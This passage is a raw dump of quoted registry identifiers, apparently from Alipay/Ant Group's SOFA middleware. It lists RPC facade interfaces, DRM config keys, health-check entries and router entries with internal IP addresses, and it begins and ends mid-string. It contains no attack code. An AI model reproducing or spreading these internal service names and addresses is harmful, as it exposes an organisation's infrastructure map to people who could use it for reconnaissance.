:ucdpcore-venue@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalproxyquery:name=com.alipay.anthubble.proxy.sla.AntHubbleSla.fusedDbNodeUsers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_MYCHAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.facade.api.VoucherActivityServiceForRecruit:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.api.ops.cache.CacheFacade:1.0:operatorCacheFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AuthTokenManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.AgdsCreditCenterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:BUILDPACK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.142.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbtraffic.common.service.facade.api.KbPushServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcsmart.facade.competitor.CompetitorDashboardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.242.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchExterfaceInvokeToUtpResource.batchRefundPwdOutStrategy,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.ebpp.ChargeInstServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.normalFailNotifyTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.changeRenewalProdConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.orderfront.common.service.facade.solution.api.SolutionProductOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventprocessorrecord.EventProcessorRecordOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.oss.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antbrain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilerelation.common.service.facade.back.TlouBizGeabaseConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtaskcenter.common.service.facade.instance.TaskInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.CashBackMallXinyiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.ssm.UserSeasonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.grayprod.change.drm.ChangePolicy.versioningPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LOGINANTZHIXIN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:app1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.trade.facade.basetrade.BuyerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_R_CZONESYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecmng.business.NotificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.policydetail.PolicyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.antha.activity.ActivityInspectManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.OperationRecordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.audit.core.service.drm.KVTemplateActionAndStyleDrm.styleConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.facade.common.user.api.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.SimulationSitOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.meta.BdmPhyIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.product.HiNetPrivateFundProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.BizEmcDcCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_COMM_MESSAGE_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.doc.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@paycore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fininfo.pcconfigObDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.1.1.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.AuditFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.role.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.client.drm.CDSClientDrm.notFallBackResultCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lendpofprod.common.service.facade.api.repay.LendRepayReminderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-insdataprod_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.finnet.service.drm.FluxstrategyDrm3rdVersion.opBizIdentifySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imdop.common.service.facade.OpKaShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.56.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.component.service.ProcessDispatcher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:scard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.AftransProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_CHARGE_MESSAGE_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.ZlcManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selfoptmng.facade.auditprocess.ProcessInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.security.common.bus.RemoteBus:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.modelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.dchainconfigcenter.facade.contract.api.ContractManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.manager.AppResourceManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.liquidity.FundManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.client.policynotify.extension.PolicyNotifyFetcherComponent:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@openinsight#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.dcprod.common.service.facade.CommunityExternalBillInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardAccrueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.TenantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.forexprod.common.service.facade.ForexMerchantWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.dUpgradeGreyWalletDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.policy.api.PolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeha.sdk.core.api.HaDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.FuseSingleStrategyDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.BusInsureFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:ebppprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.govbizcenter.service.facade.manager.OrgInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supplyservice.common.service.facade.SupplyOfferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.147.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilewealth.adapterservice.MobileWealthAdapterService:1.0:pcreditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightListDataRpcSpi:1.0:mockUserQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ChargeConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmBaselineResourceManager.ignoredProperty,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileacauth.service.terminal.facade.TerminalUserWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.close.CloseWarningQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.serverHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_ILSPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.common.service.util.MrchProdCommonUtilFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.forecast.ForcastAccountForcastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.12.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapires.facade.api.GwMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.common.ZappInfoFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insqa.facade.gift.RenewContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminPlatformFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.data.AccountsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:CACHE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.link.facade.StoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.rule.core.publish.drm.RulePublishResource.ruleModelConcurrentDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.UserApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:poscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.config.CensorOutNotifyGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkpostlending-SmartfProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:edge_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_companyForeignMemberAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nfcc.common.service.facade.egress.AppDomainEgressControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.manager.EinvApplyManagerV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.65.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.HypCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ManualManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.BenefitSendRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.proxy.QueryServiceByQuickacc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.model.budget.SubBudgetRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:riskdatacenter_capacitySCureDagnosisService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.revcore.common.service.facade.api.dailycut.AccountsAmountAdjustServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.116.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.miniprod.common.service.facade.gift.api.MiniGiftDockConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxClientQuoteInnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.koa-patch:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.template.BudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cffilefactory.facade.licensecheck.FileLicenseMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.defaultPosterBackgrounds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-upa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.securitycap.core.service.threshold.drm.ProfilerThresholdResource.detailArgs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.ArContractOperateDRM.contractQueryOnOff,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.management.CampPrizeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.VulDataMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.echox.drm.EchoxSpecialDrm.deepCloneType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkwirelessdataportal.common.service.panda.BpmsManageFacede#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sync.pubmemdb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifxtrade.core.service.event.EventRedirectService:1.0:eventRedirectServiceReference@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.OfficialAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qtmng.hds.facade.HdsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MERCHANTSETTLE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.clear.common.service.facade.TemplateContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.poscore.clientReadGroupSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.28.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.suggest.api.AssetLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tbase.CZoneTbaseCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TrafficDataNoUidServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.admin.YebcCampAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.mng.CsivrIeConfigInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.PaidMemberOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.api.ssu.SsuQueryForMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.TradeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.core.service.MerchantVipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.mgetRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.openapi.whitelist.WhiteListOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.roplib.core.model.drmdefense.DrmDefenseSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.EnergyStatusInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csinsight.core.engine.api.facade.ValidationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MBILLEXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.robot.api.PromoRobotProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.script.api.CommonFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.MultiTrusteeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.CallCenterDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileacauth.service.agreement.facade.TerminalUserAgreementWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.ContentFacade:1.0:ucdpContentFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pubcicadaruntime@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.217.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.159.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acticketcore.kernel.common.service.facade.QuestionBrainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.query.AreaInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_RISK_RESULT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:riskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.13.141.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mayibank.bkprocecore.oyz.facade.resource.DeployResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.RoleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.snapshot.TaskSnapshotFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_SECURITY_INTL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.framodel.common.service.facade.api.IndicatorDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.airmng.common.service.facade.account.AirSignMultiOperatorsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigQueryService:1.0:finpdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.back.RelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_STMTCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.modelcenter.common.service.ModelAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iacquirefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.changecore.TicketTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZDATAFRONT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yfd.common.service.facade.dm.DomainModelPublishServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@iaassettrans#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","cn.com.antcloud.acprodapicore.facade.manageapi.RequestParamManager:1.0:core@DEFAU